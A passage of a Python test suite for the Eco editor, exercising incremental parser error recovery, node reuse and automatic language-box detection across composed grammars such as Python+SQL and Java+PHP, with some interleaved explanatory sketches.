class Test_ErrorRecoveryPython(Test_Python):
def test_delete(self):
self.reset()
self.treemanager.import_file("class X:\n pass")
for i in range(18):
self.treemanager.key_delete()
def test_foo(self):
self.reset()
self.treemanager.import_file("class X:\n def x():\n x = 1")
self.move(DOWN, 2)
self.treemanager.key_end()
self.treemanager.key_backspace()
self.treemanager.key_normal("]")
self.treemanager.key_normal("e")
def test_nodereuse_bug(self):
t = TreeManager()
parser, lexer = calc.load()
t.add_parser(parser, lexer, "Calc")
t.key_normal("1")
t.key_normal("+")
t.key_normal("2")
# remember nodes
t.key_home()
t.key_cursors(RIGHT)
assert t.cursor.node.symbol.name == "1"
P = t.cursor.node.parent
T = t.cursor.node.parent.parent
E = t.cursor.node.parent.parent.parent
assert P.symbol.name == "P"
assert T.symbol.name == "T"
assert E.symbol.name == "E"
t.key_normal("+")
# check if nodes have been reused
t.key_home()
t.key_cursors(RIGHT)
assert t.cursor.node.symbol.name == "1"
assert t.cursor.node.parent is P
assert t.cursor.node.parent.parent is T
assert t.cursor.node.parent.parent.parent is E
class Test_ErrorRecoveryJava(Test_Java):
def test_delete(self):
self.reset()
self.treemanager.import_file("class X{\n int x;\n}")
for i in range(36):
self.treemanager.key_delete()
def test_foo(self):
self.reset()
self.treemanager.import_file("class X{\n public void main()(){\n int x = 1;\n}\n}")
self.move(DOWN, 2)
self.treemanager.key_end()
self.move(LEFT, 1)
self.treemanager.key_backspace()
self.treemanager.key_normal("]")
self.treemanager.key_normal("e")
from grammars.grammars import EcoFile
class Test_ErrorRecoveryRightbreakdown:
def test_simple(self):
# With the default Wagner implementation this test breaks upon
# attempting a rightbreakdown on a subtree that has been isolated.
# Wagner's thesis doesn't mention anything related to this, which
# either means they didn't run into it or they are doing something
# behind the scenes that they don't describe.
# My solution is simply to cancel the rightbreakdown procedure when it
# reaches an isolated subtree.
grm = EcoFile("Errortest", "test/errortest.eco", "Error")
t = TreeManager()
parser, lexer = grm.load()
t.add_parser(parser, lexer, python.name)
t.key_normal("a")
t.key_normal("b")
t.key_normal("w")
t.key_normal("s")
assert parser.last_status == True
t.key_cursors(LEFT)
t.key_cursors(LEFT)
t.key_cursors(LEFT)
t.key_normal("c")
t.key_delete()
assert parser.last_status == False
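The fix described in the comment above can be sketched as a guard in the rightbreakdown loop. The node structure and `shift` callback here are hypothetical stand-ins; Eco's real parser state differs.

```python
class Node:
    def __init__(self, children=None, isolated=False):
        self.children = children or []
        self.isolated = isolated

def rightbreakdown(node, shift):
    """Walk down the right spine of a subtree, shifting each left-hand
    sibling, but cancel as soon as an isolated (error-recovered)
    subtree is reached instead of breaking it apart."""
    while node.children:
        if node.isolated:
            return  # cancel: never break down an isolated subtree
        for child in node.children[:-1]:
            shift(child)
        node = node.children[-1]

shifted = []
iso = Node([Node()], isolated=True)
root = Node([Node(), Node([Node(), iso])])
rightbreakdown(root, shifted.append)
# The isolated subtree was neither shifted nor descended into.
assert iso not in shifted
assert iso.children[0] not in shifted
```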
class Test_ErrorRecoverySurroundingContext:
def test_simple(self):
# This test checks the correct behaviour for skipping already isolated
# subtrees. Before we can skip an isolated subtree, we need to make sure
# that its surrounding context hasn't changed. The surrounding context
# of an isolated subtree is its next terminal. So if the left-most
# subtree to the right of the isolated subtree has changes, we need to
# reevaluate the isolated subtree and cannot skip it.
# Also tests that isolated subtrees are reached at all, as we need to keep
# a changed path down to the isotree to recheck their surrounding
# context.
grm = EcoFile("ErrortestSur", "test/errorsurroundingcontext.eco", "ErrorSurround")
t = TreeManager()
parser, lexer = grm.load()
t.add_parser(parser, lexer, python.name)
t.key_normal("a")
t.key_normal("c")
t.key_cursors(LEFT)
t.key_normal("b")
t.key_cursors(RIGHT)
t.key_normal("d")
assert parser.last_status == True
t.key_home()
t.key_cursors(RIGHT)
assert t.cursor.node.symbol.name == "ab"
# without checking surrounding context this would be 'left'
assert t.cursor.node.parent.symbol.name == "left2"
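The skip condition described in the comment above can be paraphrased as a small predicate (names are hypothetical, not Eco's implementation): an isolated subtree may only be skipped when neither it nor its surrounding context, i.e. its next terminal, has changed.

```python
from collections import namedtuple

# Illustrative stand-in: a subtree with a changed flag (not Eco's API).
Subtree = namedtuple("Subtree", ["changed"])

def can_skip_isolated(isolated_subtree, next_terminal):
    """An isolated subtree may be skipped only if both the subtree and
    its surrounding context (the next terminal) are unchanged."""
    return not isolated_subtree.changed and not next_terminal.changed

assert can_skip_isolated(Subtree(False), Subtree(False))
# A changed next terminal forces reevaluation, as in the test above.
assert not can_skip_isolated(Subtree(False), Subtree(True))
```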
class Test_RetainSubtree:
def test_simple(self):
# This test checks that if a node is being retained but its parent node
# was reset, the siblings of the node are updated as well, as they
# could have changed when the parent was reverted to the previous
# version.
grm = EcoFile("RetainTest", "test/retaincalc.eco", "RetainTest")
t = TreeManager()
parser, lexer = grm.load()
t.add_parser(parser, lexer, "RT")
t.key_normal("1")
t.key_normal("+")
t.key_normal("2")
t.key_home()
t.key_cursors(RIGHT)
assert t.cursor.node.symbol.name == "1"
assert t.cursor.node.parent.symbol.name == "P"
t.key_normal("*")
t.key_cursors(LEFT)
assert t.cursor.node.symbol.name == "1"
assert t.cursor.node.parent.symbol.name == "P" # must not be 'X'
def test_simple2(self):
# Tests basic retainability
grm = EcoFile("RetainTest2", "test/retaincalc2.eco", "RetainTest2")
t = TreeManager()
parser, lexer = grm.load()
t.add_parser(parser, lexer, "RT")
t.key_normal("1")
t.key_normal("*")
t.key_normal("2")
# Create an error
t.key_cursors(LEFT)
t.key_normal("*")
# Add changes that can be retained
t.key_home()
t.key_cursors(RIGHT)
t.key_normal("-")
t.key_normal("3")
assert t.cursor.node.symbol.name == "3"
assert t.cursor.node.parent.symbol.name == "X" # will be 'P' without retaining
def test_bug1(self):
"""There is currently a bug in the retainability algorithm that causes
an infinite loop when a certain subtree is retained. In this test case
the bug happens when an empty non-terminal A (child of node B) is being
reused and becomes a child of another node C. After error recovery the
previous parent (B) is reverted which includes resetting A as well.
However the new parent (C) is being retained, causing it to keep a child
reference to A. Now A is being referenced by two different parents (B
and C), causing an infinite loop when traversing the parse tree. The
implementation however is correct and the error can also be reproduced
when manually applying Wagners algorithm to this problem. For this
reason retainability is current disabled in the parser until this
problem has been resolved."""
t = TreeManager()
parser, lexer = python.load()
t.add_parser(parser, lexer, "Python")
for c in "class X:\n pass":
t.key_normal(c)
t.key_cursors(UP)
t.key_home()
t.key_delete()
t.key_delete()
t.key_delete()
t.key_delete()
t.key_delete()
startrule = parser.previous_version.parent.children[1]
assert startrule.symbol.name == "Startrule"
WS = startrule.children[0]
assert WS.symbol.name == "WS"
assert WS.parent is startrule
classdef = startrule.children[1].children[0].children[0].children[0].children[0]
assert classdef.symbol.name == "classdef"
WS2 = classdef.children[1]
assert WS2.symbol.name == "WS"
WS3 = WS2.children[0]
assert WS3.symbol.name == "WS"
# current retaining creates a loop here as 'WS' is partly reverted and
# retained at the same time
assert WS3 is not WS
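The docstring of `test_bug1` describes node A ending up with two parents. A self-contained sketch (toy `Node` class, not Eco's) of why that shape is pathological: a plain traversal reaches the shared child once per parent, and with parent back-pointers that duplication is what lets the walk cycle forever.

```python
class Node:
    """Toy node used only for this sketch (not Eco's node class)."""
    def __init__(self, name, children=None):
        self.name = name
        self.children = children or []

def count_visits(root):
    """Count how often each node name is reached by a plain DFS."""
    visits = {}
    stack = [root]
    while stack:
        node = stack.pop()
        visits[node.name] = visits.get(node.name, 0) + 1
        stack.extend(node.children)
    return visits

# A is a child of both B (the reverted parent) and C (the retained one).
a = Node("A")
b = Node("B", [a])
c = Node("C", [a])
visits = count_visits(Node("root", [b, c]))
assert visits["A"] == 2  # the duplication behind the infinite loop
```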
class Test_TopDownReuse(Test_Python):
def test_basic(self):
grm = EcoFile("Undotest", "test/undobug1.eco", "Undo")
t = TreeManager()
parser, lexer = grm.load()
t.add_parser(parser, lexer, python.name)
t.key_normal("a")
t.undo_snapshot()
t.key_normal("b")
t.undo_snapshot()
t.key_normal("c")
t.undo_snapshot()
assert parser.last_status == True
startrule = parser.previous_version.parent.children[1]
E = startrule.children[1]
assert E.symbol.name == "E"
Y = E.children[0]
assert Y.symbol.name == "Y"
t.key_cursors(LEFT)
t.key_cursors(LEFT)
t.key_normal("x")
t.undo_snapshot()
assert parser.last_status == True
startrule2 = parser.previous_version.parent.children[1]
E2 = startrule2.children[1]
assert E2.symbol.name == "E"
Y2 = E2.children[0]
assert Y2.symbol.name == "Y"
# check if they have been reused
assert startrule is startrule2
assert E is E2
assert Y is Y2
sql_single = lang_dict["SQL Statement"]
javapy = lang_dict["Java + Python"]
javasql = lang_dict["Java + SQL"]
javasqlchemical = javasql
# Add some more compositions that we only need inside the test environment
pythonsql = EcoFile("Python + SQL", "grammars/python275.eco", "Python")
pythonsql.add_alternative("atom", sql_single)
lang_dict[pythonsql.name] = pythonsql
import json
from grammars.grammars import create_grammar_from_config
with open("test/javasqldummy.json") as f:
cfg = json.load(f)
javasql2_name = create_grammar_from_config(cfg, "test/javasqldummy.json")
javasqlchemical = lang_dict[javasql2_name]
grm_cache = {}
def load_json_grammar(filename):
if filename in grm_cache:
return grm_cache[filename]
with open(filename) as f:
cfg = json.load(f)
name = create_grammar_from_config(cfg, filename)
grm = lang_dict[name]
grm_cache[filename] = grm
return grm
class Test_AutoLanguageBoxDetection:
def test_pythonsql(self):
parser, lexer = pythonsql.load()
parser.setup_autolbox(pythonsql.name, lexer)
treemanager = TreeManager()
treemanager.option_autolbox_insert = True
treemanager.add_parser(parser, lexer, "")
for c in "x = SELECT * FROM table WHERE y=1":
treemanager.key_normal(c)
assert len(treemanager.parsers) == 2
assert parser.last_status == True
def test_pythonsql2(self):
parser, lexer = pythonsql.load()
parser.setup_autolbox(pythonsql.name, lexer)
treemanager = TreeManager()
treemanager.option_autolbox_insert = True
treemanager.add_parser(parser, lexer, "")
treemanager.key_normal(";")
treemanager.key_cursors(LEFT)
for c in "x = SELECT * FROM table":
treemanager.key_normal(c)
assert len(treemanager.parsers) == 2
def test_java_python(self):
parser, lexer = javapy.load()
parser.setup_autolbox(javapy.name, lexer)
treemanager = TreeManager()
treemanager.option_autolbox_insert = True
treemanager.add_parser(parser, lexer, "")
for c in "class X {\n\n}":
treemanager.key_normal(c)
assert parser.last_status == True
treemanager.key_cursors(UP)
for c in " def x():\n ":
treemanager.key_normal(c)
assert parser.last_status == False
assert len(treemanager.parsers) == 1
treemanager.key_normal("p")
assert parser.last_status == True
assert len(treemanager.parsers) == 2
def test_java_python2(self):
parser, lexer = javapy.load()
parser.setup_autolbox(javapy.name, lexer)
treemanager = TreeManager()
treemanager.option_autolbox_insert = True
treemanager.add_parser(parser, lexer, "")
for c in "class X {\n\n\n\n}":
treemanager.key_normal(c)
assert parser.last_status == True
treemanager.key_cursors(UP)
treemanager.key_cursors(UP)
for c in " def x():\n ":
treemanager.key_normal(c)
assert parser.last_status == False
assert len(treemanager.parsers) == 1
treemanager.key_normal("p")
assert parser.last_status == True
assert len(treemanager.parsers) == 2
@pytest.mark.xfail
def test_java_python3(self):
"""Currently fails as `public` is being parsed into the Python language
box."""
parser, lexer = javapy.load()
parser.setup_autolbox(javapy.name, lexer)
treemanager = TreeManager()
treemanager.option_autolbox_insert = True
treemanager.add_parser(parser, lexer, "")
code = """class X {
public void y(){
}
}"""
for c in code:
treemanager.key_normal(c)
assert parser.last_status == True
treemanager.key_cursors(LEFT)
treemanager.key_cursors(UP)
treemanager.key_cursors(UP)
treemanager.key_cursors(UP)
treemanager.key_cursors(UP)
for c in " def x():\n ":
treemanager.key_normal(c)
assert len(treemanager.parsers) == 1
assert parser.last_status == False
treemanager.key_normal("p")
assert len(treemanager.parsers) == 2
assert parser.last_status == True
def test_php_python5_first_line_box(self):
parser, lexer = phppython.load()
parser.setup_autolbox(phppython.name, lexer)
treemanager = TreeManager()
treemanager.option_autolbox_insert = True
treemanager.add_parser(parser, lexer, "")
for c in "def x():\n ":
treemanager.key_normal(c)
treemanager.key_normal("p")
assert parser.last_status == True
assert len(treemanager.parsers) == 2
def test_php_python_expression(self):
"""Results in two options for language box:
Python or Python expression"""
parser, lexer = phppython.load()
parser.setup_autolbox(phppython.name, lexer)
treemanager = TreeManager()
treemanager.option_autolbox_insert = True
treemanager.add_parser(parser, lexer, "")
for c in "$x = [x for x in range(10)":
treemanager.key_normal(c)
assert parser.last_status == False
treemanager.key_normal("]")
treemanager.leave_languagebox()
treemanager.key_normal(";")
assert len(parser.error_nodes) == 1
assert len(parser.error_nodes[0].autobox) == 2
def test_php_python_expression2(self):
"""Previously, we could only find the `not 2` option here. With the
introduction of the line heuristic, we can now find the full expression
`1 or not 2` as well."""
parser, lexer = phppython.load()
parser.setup_autolbox(phppython.name, lexer)
treemanager = TreeManager()
treemanager.option_autolbox_insert = True
treemanager.add_parser(parser, lexer, "")
for c in "$x = 1 or not ":
treemanager.key_normal(c)
assert len(treemanager.parsers) == 1
assert len(parser.error_nodes) == 1
assert parser.error_nodes[0].autobox is None
treemanager.key_normal("2")
treemanager.key_normal(";")
assert len(parser.error_nodes) == 1
assert len(parser.error_nodes[0].autobox) == 4
def test_include_rules(self):
grm = EcoFile("Python + HTML (Include)", "grammars/python275.eco", "Python")
grm.add_alternative("atom", html)
grm.set_auto_include("HTML", set(["<html", "<img"]))
lang_dict[grm.name] = grm
parser, lexer = grm.load()
parser.setup_autolbox(grm.name, lexer)
treemanager = TreeManager()
treemanager.option_autolbox_insert = True
treemanager.add_parser(parser, lexer, "")
for c in "x = <html></html>":
treemanager.key_normal(c)
assert len(treemanager.parsers) == 2
parser.reset()
treemanager = TreeManager()
treemanager.option_autolbox_insert = True
treemanager.add_parser(parser, lexer, "")
for c in "x = <span></span>":
treemanager.key_normal(c)
assert len(treemanager.parsers) == 1
def test_exclude_rules(self):
grm = EcoFile("Python + HTML (Exclude)", "grammars/python275.eco", "Python")
grm.add_alternative("atom", html)
grm.set_auto_exclude("HTML", set(["TEXT"]))
lang_dict[grm.name] = grm
parser, lexer = grm.load()
parser.setup_autolbox(grm.name, lexer)
treemanager = TreeManager()
treemanager.option_autolbox_insert = True
treemanager.add_parser(parser, lexer, "")
for c in "x = <span></span>":
treemanager.key_normal(c)
assert len(treemanager.parsers) == 2
parser.reset()
treemanager = TreeManager()
treemanager.option_autolbox_insert = True
treemanager.add_parser(parser, lexer, "")
for c in "x = FROM table":
treemanager.key_normal(c)
assert len(treemanager.parsers) == 1
assert parser.error_nodes[0].autobox is None # would be set without excluding TEXT
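The two tests above exercise include and exclude rules for automatic language box detection. A hedged sketch of the filtering they imply (function and parameter names are made up for illustration, not Eco's API):

```python
def box_allowed(token_type, token_text, includes=None, excludes=None):
    """Offer an automatic language box only if the token matches an
    include prefix (when includes are configured) and its token type
    is not excluded. Illustrative only, not Eco's implementation."""
    if includes is not None and not any(
            token_text.startswith(prefix) for prefix in includes):
        return False
    if excludes is not None and token_type in excludes:
        return False
    return True

# Mirrors test_include_rules: only <html...> / <img...> trigger a box.
assert box_allowed("TAG", "<html>", includes={"<html", "<img"})
assert not box_allowed("TAG", "<span>", includes={"<html", "<img"})
# Mirrors test_exclude_rules: TEXT tokens never trigger a box.
assert not box_allowed("TEXT", "FROM", excludes={"TEXT"})
```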
def test_autoremove_pythonsql(self):
parser, lexer = pythonsql.load()
parser.setup_autolbox(pythonsql.name, lexer)
treemanager = TreeManager()
treemanager.option_autolbox_insert = True
treemanager.add_parser(parser, lexer, "")
for c in "x = SELECT * FROM table":
treemanager.key_normal(c)
assert parser.last_status == True
assert len(treemanager.parsers) == 2
treemanager.key_cursors(LEFT)
treemanager.key_cursors(LEFT)
treemanager.key_cursors(LEFT)
treemanager.key_cursors(LEFT)
treemanager.key_cursors(LEFT)
treemanager.key_normal("*") # valid Python now
assert len(treemanager.parsers) == 1
assert parser.last_status == True
def test_php_python_paste(self):
parser, lexer = phppython.load()
parser.setup_autolbox(phppython.name, lexer)
treemanager = TreeManager()
treemanager.option_autolbox_insert = True
treemanager.add_parser(parser, lexer, "")
for c in "class X{\n}":
treemanager.key_normal(c)
assert len(treemanager.parsers) == 1
treemanager.key_cursors(LEFT)
treemanager.key_normal("\n")
treemanager.key_cursors(UP)
treemanager.key_normal(" ")
treemanager.key_normal(" ")
treemanager.key_normal(" ")
treemanager.key_normal(" ")
treemanager.pasteText("def x():\n pass;")
assert parser.last_status is True
assert len(treemanager.parsers) == 2
def test_php_python_paste2(self):
parser, lexer = phppython.load()
parser.setup_autolbox(phppython.name, lexer)
treemanager = TreeManager()
treemanager.option_autolbox_insert = True
treemanager.add_parser(parser, lexer, "")
for c in "function x(){\n}":
treemanager.key_normal(c)
assert len(treemanager.parsers) == 1
treemanager.key_cursors(LEFT)
treemanager.key_normal("\n")
treemanager.key_cursors(UP)
treemanager.key_normal(" ")
treemanager.key_normal(" ")
treemanager.key_normal(" ")
treemanager.key_normal(" ")
treemanager.pasteText("$x = def x():\n pass;")
# XXX problem: error happens on `}` but `reduce_ends` only checks
# next terminal which is `<return>` and can be parsed
assert parser.last_status is True
assert len(treemanager.parsers) == 2
def test_python_sql_bug(self):
parser, lexer = pythonsql.load()
parser.setup_autolbox(pythonsql.name, lexer)
treemanager = TreeManager()
treemanager.option_autolbox_insert = True
treemanager.add_parser(parser, lexer, "")
for c in "x = SELECT * FROM table":
treemanager.key_normal(c)
assert len(treemanager.parsers) == 2
for _ in range(5):
treemanager.key_cursors(LEFT)
treemanager.key_normal("*")
assert len(treemanager.parsers) == 1
treemanager.key_backspace()
assert len(treemanager.parsers) == 2
def test_newbug(self):
parser, lexer = phppython.load()
parser.setup_autolbox(phppython.name, lexer)
treemanager = TreeManager()
treemanager.option_autolbox_insert = True
treemanager.add_parser(parser, lexer, "")
phpprogram = """function x(){
$x = 12;
}"""
# delete 12
treemanager.import_file(phpprogram)
treemanager.key_cursors(DOWN)
treemanager.key_end()
treemanager.key_cursors(LEFT)
treemanager.key_backspace()
treemanager.key_backspace()
for c in "[1,2.3]":
treemanager.key_normal(c)
treemanager.key_cursors(LEFT)
treemanager.key_cursors(LEFT)
treemanager.key_cursors(LEFT)
treemanager.key_cursors(LEFT)
treemanager.key_cursors(LEFT)
# check that there wasn't a language box inserted around '1'
assert treemanager.cursor.node.symbol.name == "1"
def test_newbug2(self):
parser, lexer = phppython.load()
parser.setup_autolbox(phppython.name, lexer)
treemanager = TreeManager()
treemanager.option_autolbox_insert = True
treemanager.add_parser(parser, lexer, "")
for c in """function x(){
$x = [1,2,3];
}""":
treemanager.key_normal(c)
def test_newbug3(self):
parser, lexer = phppython.load()
parser.setup_autolbox(phppython.name, lexer)
treemanager = TreeManager()
treemanager.option_autolbox_insert = True
treemanager.add_parser(parser, lexer, "")
p = """function x(){
$x = [1,2,3];
}"""
treemanager.import_file(p)
treemanager.key_cursors(DOWN)
treemanager.key_cursors(DOWN)
treemanager.key_end()
for _ in range(len(p)):
treemanager.key_backspace()
def test_php_bug4(self):
parser, lexer = phppython.load()
parser.setup_autolbox(phppython.name, lexer)
treemanager = TreeManager()
treemanager.option_autolbox_insert = True
treemanager.add_parser(parser, lexer, "")
p = """function x(){
return 12;
}"""
treemanager.import_file(p)
treemanager.key_cursors(DOWN)
treemanager.key_home()
for c in " $x = def y():":
treemanager.key_normal(c)
assert len(treemanager.parsers) == 2
def test_java_py_string(self):
parser, lexer = javapy.load()
parser.setup_autolbox(javapy.name, lexer)
treemanager = TreeManager()
treemanager.option_autolbox_insert = True
treemanager.add_parser(parser, lexer, "")
p = """class X {
int x = "test";
}"""
for c in p:
treemanager.key_normal(c)
def test_java_sql_autoremove_valid_boxes(self):
parser, lexer = javasqlchemical.load()
parser.setup_autolbox(javasqlchemical.name, lexer)
treemanager = TreeManager()
treemanager.option_autolbox_insert = True
treemanager.add_parser(parser, lexer, "")
p = """class X {
int x = 1;
}"""
for c in p:
treemanager.key_normal(c)
assert len(treemanager.parsers) == 1
treemanager.key_cursors(UP)
treemanager.key_end()
treemanager.key_cursors(LEFT)
treemanager.key_backspace()
for c in "SELECT * FROM table;":
treemanager.key_normal(c)
assert len(treemanager.parsers) == 2
treemanager.key_backspace() # delete ;
treemanager.key_cursors(LEFT)
treemanager.key_cursors(LEFT)
treemanager.key_cursors(LEFT)
treemanager.key_cursors(LEFT)
treemanager.key_cursors(LEFT)
treemanager.key_normal("*")
assert len(treemanager.parsers) == 1
def test_java_python_method_insert_bug1(self):
parser, lexer = javapy.load()
parser.setup_autolbox(javapy.name, lexer)
treemanager = TreeManager()
treemanager.option_autolbox_insert = True
treemanager.add_parser(parser, lexer, "")
p = """class X {
public boolean main(){}
}"""
for c in p:
treemanager.key_normal(c)
assert len(treemanager.parsers) == 1
treemanager.key_cursors(UP)
treemanager.key_cursors(UP)
treemanager.key_cursors(UP)
treemanager.key_home()
for c in " ":
treemanager.key_normal(c)
treemanager.key_normal("d")
assert len(treemanager.parsers) == 1
def test_deactivate_autobox_after_undo(self):
"""Once an automatically inserted language box has been
undone, it shouldn't be inserted again on another change."""
parser, lexer = javapy.load()
parser.setup_autolbox(javapy.name, lexer)
treemanager = TreeManager()
treemanager.option_autolbox_insert = True
treemanager.add_parser(parser, lexer, "")
program = """class X {
int x = 12;
}"""
for c in program:
treemanager.key_normal(c)
assert len(treemanager.parsers) == 1
treemanager.key_cursors(UP)
treemanager.key_end()
treemanager.key_cursors(LEFT)
treemanager.key_cursors(LEFT)
for c in " and ":
treemanager.key_normal(c)
assert len(treemanager.parsers) == 2
treemanager.key_ctrl_z()
assert len(treemanager.parsers) == 1
treemanager.key_cursors(RIGHT)
for c in " or 3":
treemanager.key_normal(c)
assert len(treemanager.parsers) == 1
def test_php_python_whitespace_bug(self):
parser, lexer = phppython.load()
parser.setup_autolbox(phppython.name, lexer)
treemanager = TreeManager()
treemanager.option_autolbox_insert = True
treemanager.add_parser(parser, lexer, "")
p = """class X {
d();
}"""
for c in p:
treemanager.key_normal(c)
assert len(treemanager.parsers) == 2
treemanager.key_cursors(UP)
treemanager.key_end()
treemanager.key_cursors(LEFT)
treemanager.key_cursors(LEFT)
treemanager.key_cursors(LEFT)
treemanager.key_cursors(LEFT)
assert treemanager.parsers[0][0].last_status is True # PHP
assert treemanager.parsers[1][0].last_status is True # Python
treemanager.key_normal(" ")
assert treemanager.parsers[0][0].last_status is True
assert treemanager.parsers[1][0].last_status is False
treemanager.key_backspace()
assert treemanager.parsers[0][0].last_status is True
assert treemanager.parsers[1][0].last_status is True
import os
@pytest.mark.skipif("TRAVIS" in os.environ and os.environ["TRAVIS"] == "true", reason="JavaSQL takes too long to build on Travis. Skip!")
def test_java_sql_skip_comments(self):
p = """public class Scribble {
public void init() {
// A comment
this.foo1(code.replace());
// Another comment
this.foo2();
}
}"""
parser, lexer = javasql.load()
parser.setup_autolbox(javasql.name, lexer)
treemanager = TreeManager()
treemanager.option_autolbox_insert = True
treemanager.add_parser(parser, lexer, "")
for c in p:
treemanager.key_normal(c)
assert parser.last_status == True
treemanager.key_cursors(UP)
treemanager.key_cursors(UP)
treemanager.key_cursors(UP)
treemanager.key_cursors(UP)
treemanager.key_cursors(UP)
treemanager.key_end()
treemanager.key_cursors(LEFT)
treemanager.key_cursors(LEFT)
for _ in range(14):
treemanager.key_backspace()
assert parser.last_status == True
p = """SELECT ProductName
FROM Products
WHERE ProductID IN (SELECT ProductID FROM OrderDetails WHERE Quantity = 10);"""
for c in p:
treemanager.key_normal(c)
assert len(treemanager.parsers) == 2
assert parser.last_status == True
def test_java_sql_ranking(self):
p = """class C {
int x = 1, y = 2;
int y = 1 + 2 * 3;
int z = 4 + 5 - 6;
}"""
parser, lexer = javasql.load()
parser.setup_autolbox(javasql.name, lexer)
treemanager = TreeManager()
treemanager.option_autolbox_insert = True
treemanager.add_parser(parser, lexer, "")
for c in p:
treemanager.key_normal(c)
treemanager.key_cursors(UP)
treemanager.key_cursors(UP)
treemanager.key_cursors(UP)
treemanager.key_end()
for i in range(8):
treemanager.key_cursors(LEFT)
treemanager.key_backspace()
for s in "SELECT a":
treemanager.key_normal(s)
assert len(parser.error_nodes[0].autobox) == 2
def test_php_python_autoremove(self):
"""Sometimes automatically inserted boxes are valid in both languages.
Previously we only autoremoved boxes that were invalid. However, we
should always prioritise the outer language instead even if the language
box is a valid insertion."""
parser, lexer = phppython.load()
parser.setup_autolbox(phppython.name, lexer)
treemanager = TreeManager()
treemanager.option_autolbox_insert = True
treemanager.add_parser(parser, lexer, "")
treemanager.key_normal("f")
assert len(treemanager.parsers) == 2
treemanager.key_normal("o")
assert len(treemanager.parsers) == 2
treemanager.key_normal("o")
assert len(treemanager.parsers) == 2
treemanager.key_normal("(")
assert len(treemanager.parsers) == 1
treemanager.key_normal(")")
assert len(treemanager.parsers) == 2
treemanager.key_normal(";")
assert len(treemanager.parsers) == 1
assert parser.last_status == True
@pytest.mark.xfail
def test_php_python_auto_bug(self):
"""PHP equivalent to `test_java_python3`. Fails because `public` is
optional in PHP and thus can be used in a Python box without making the
PHP program invalid."""
parser, lexer = phppython.load()
parser.setup_autolbox(phppython.name, lexer)
treemanager = TreeManager()
treemanager.option_autolbox_insert = True
treemanager.add_parser(parser, lexer, "")
p = """class X {
public function x(){}
}"""
for c in p:
treemanager.key_normal(c)
assert len(treemanager.parsers) == 1
assert parser.last_status == True
treemanager.key_cursors(UP)
treemanager.key_home()
treemanager.key_cursors(RIGHT)
treemanager.key_cursors(RIGHT)
treemanager.key_cursors(RIGHT)
treemanager.key_cursors(RIGHT)
treemanager.key_normal("d")
assert len(treemanager.parsers) == 1
assert parser.last_status == False
def test_java_lua_dont_remove_explicit_lboxes(self):
grm = load_json_grammar("test/javalua_expr.json")
parser, lexer = grm.load()
parser.setup_autolbox(grm.name, lexer)
treemanager = TreeManager()
treemanager.option_autolbox_insert = True
treemanager.add_parser(parser, lexer, "")
p = """class X {
int x = 1;
}"""
for c in p:
treemanager.key_normal(c)
assert len(treemanager.parsers) == 1
assert parser.last_status == True
treemanager.key_cursors(UP)
treemanager.key_end()
treemanager.key_cursors(LEFT)
treemanager.add_languagebox(lang_dict["Lua expr"])
treemanager.key_normal("a")
assert len(treemanager.parsers) == 2
assert parser.last_status == False
@pytest.mark.skip("Broken by line heuristic. Requires expanding boxes to include following language boxes.")
def test_java_php_expand(self):
grm = load_json_grammar("test/javaphp_expr.json")
parser, lexer = grm.load()
parser.setup_autolbox(grm.name, lexer)
treemanager = TreeManager()
treemanager.option_autolbox_insert = True
treemanager.add_parser(parser, lexer, "")
p = """class X {
int x = 1 == 2;
}"""
for c in p:
treemanager.key_normal(c)
assert len(treemanager.parsers) == 1
assert parser.last_status == True
treemanager.key_cursors(UP)
treemanager.key_end()
treemanager.key_cursors(LEFT)
treemanager.key_cursors(LEFT)
treemanager.key_cursors(LEFT)
treemanager.key_cursors(LEFT)
treemanager.key_cursors(LEFT)
treemanager.key_cursors(LEFT)
treemanager.key_backspace() # delete `1`
p2 = "!e($x) ? $y : $z"
for c in p2:
treemanager.key_normal(c)
assert len(treemanager.parsers) == 2
assert parser.last_status == False # only `!e($x)` wrapped in lbox
treemanager.key_end()
treemanager.key_cursors(LEFT)
treemanager.key_backspace()
treemanager.key_backspace()
treemanager.key_backspace()
treemanager.key_backspace()
assert len(treemanager.parsers) == 2 # box now has been expanded
assert parser.last_status == True
def test_java_php_shrink_bug(self):
grm = load_json_grammar("test/javaphp_expr.json")
parser, lexer = grm.load()
parser.setup_autolbox(grm.name, lexer)
treemanager = TreeManager()
treemanager.option_autolbox_insert = True
treemanager.add_parser(parser, lexer, "")
assert len(treemanager.parsers) == 1
p = """class X {
public void println() {
if (numPrinted >= numLines) {
}
int x = (a == 'x');
}
}"""
treemanager.import_file(p)
assert len(treemanager.parsers) == 1
assert parser.last_status == True
treemanager.key_cursors(DOWN)
treemanager.key_cursors(DOWN)
treemanager.key_end()
treemanager.key_cursors(LEFT)
treemanager.key_cursors(LEFT)
treemanager.key_cursors(LEFT)
for i in range(22):
treemanager.key_backspace()
p2 = "'set_transient_' . $transient'"
for c in p2:
treemanager.key_normal(c)
assert parser.last_status == True
def test_java_php_shrink_bug2(self):
grm = load_json_grammar("test/javaphp_expr.json")
parser, lexer = grm.load()
parser.setup_autolbox(grm.name, lexer)
treemanager = TreeManager()
treemanager.option_autolbox_insert = True
treemanager.add_parser(parser, lexer, "")
assert len(treemanager.parsers) == 1
p = """class X {
public void println() {
if (i < fDepth - 1) {
System.out.print(',');
}
}
}"""
treemanager.import_file(p)
assert len(treemanager.parsers) == 1
assert parser.last_status == True
treemanager.key_cursors(DOWN)
treemanager.key_cursors(DOWN)
treemanager.key_end()
treemanager.key_cursors(LEFT)
treemanager.key_cursors(LEFT)
treemanager.key_cursors(LEFT)
for i in range(14):
treemanager.key_backspace()
p2 = "d('i') && $s->l('i')"
for c in p2:
treemanager.key_normal(c)
assert parser.last_status == True
def test_java_php_preparse_bug(self):
grm = load_json_grammar("test/javaphp_expr.json")
parser, lexer = grm.load()
parser.setup_autolbox(grm.name, lexer)
treemanager = TreeManager()
treemanager.option_autolbox_insert = True
treemanager.add_parser(parser, lexer, "")
assert len(treemanager.parsers) == 1
p = """class C {
public static int contents = {
{ SOMEVAR, "strubg" },
{ ANOTHERVAR, "string ',' string!"}
};
}"""
treemanager.import_file(p)
assert len(treemanager.parsers) == 1
assert parser.last_status == True
treemanager.key_cursors(DOWN)
treemanager.key_cursors(DOWN)
treemanager.key_end()
for i in range(13):
treemanager.key_cursors(LEFT)
for i in range(7):
treemanager.key_backspace()
for c in "'test'":
print("input", c)
treemanager.key_normal(c)
def test_java_php_slashslash_bug(self):
grm = load_json_grammar("test/javaphp_expr.json")
parser, lexer = grm.load()
parser.setup_autolbox(grm.name, lexer)
treemanager = TreeManager()
treemanager.option_autolbox_insert = True
